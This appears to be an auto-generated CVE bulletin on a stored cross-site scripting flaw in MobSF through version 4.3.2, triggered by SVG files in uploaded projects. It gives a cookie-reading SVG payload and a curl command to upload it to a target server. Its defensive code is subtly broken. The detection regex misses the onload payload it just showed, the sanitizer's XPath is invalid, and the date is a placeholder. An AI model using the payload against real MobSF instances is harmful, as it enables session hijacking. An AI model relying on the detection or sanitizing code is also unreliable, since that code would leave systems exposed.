The vulnerability in MobSF (<= v4.3.2) allows stored Cross-Site Scripting (XSS) via malicious SVG files during APK analysis. When an attacker uploads a crafted Android Studio project containing an SVG with embedded JavaScript, MobSF fails to sanitize the file during extraction. The SVG is saved in `~/.MobSF/downloads/` and served via the web interface at `http://127.0.0.1:8081/download/filename.svg`. Accessing this file triggers the XSS payload in the victim’s browser, compromising their session.
DailyCVE Form:
Platform: MobSF
Version: <=4.3.2
Vulnerability: Stored XSS
Severity: High
Date: 2024-XX-XX
What Undercode Say:
Exploitation:
1. Craft malicious SVG:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
2. Embed in APK:
zip -r malicious_apk.zip /path/to/project
3. Upload to MobSF:
curl -F 'file=@malicious_apk.zip' http://target:8081/api/v1/upload
Detection:
Check SVG handling in MobSF:
import re def is_safe_svg(content): return not re.search(r'<script|javascript:', content, re.I)
Mitigation:
1. Update MobSF to v4.3.3+.
2. Sanitize SVG uploads:
from lxml import etree
def sanitize_svg(svg_file):
parser = etree.XMLParser(resolve_entities=False)
tree = etree.parse(svg_file, parser)
for elem in tree.xpath('//[@onload]'):
elem.attrib.pop('onload')
return etree.tostring(tree)
3. Restrict file access:
location /downloads/ {
deny all;
}
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
